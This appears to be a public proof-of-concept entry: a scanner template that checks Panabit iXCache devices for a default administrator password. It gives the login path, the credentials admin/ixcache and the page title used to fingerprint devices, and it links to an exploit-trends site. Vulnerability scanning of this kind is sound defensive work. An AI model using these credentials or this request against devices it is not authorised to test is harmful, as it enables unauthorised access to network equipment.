panabit-ixcache-default-password: Panabit Ixcache Default Password

2025-08-01 Panabit Ixcache PoC Public

Description

body="<title>iXCache</title>"

PoC

id: panabit-ixcache-default-password

info:
  name: Panabit Ixcache Default Password
  author: B1anda0
  severity: high
  verified: true
  description: |-
    body="<title>iXCache</title>"
  tags: panabit,ixcache,defaultpassword
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /login/userverify.cgi
      body: username=admin&password=ixcache
    expression: response.status == 200 && response.body.ibcontains(b"URL=/cgi-bin/monitor.cgi")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities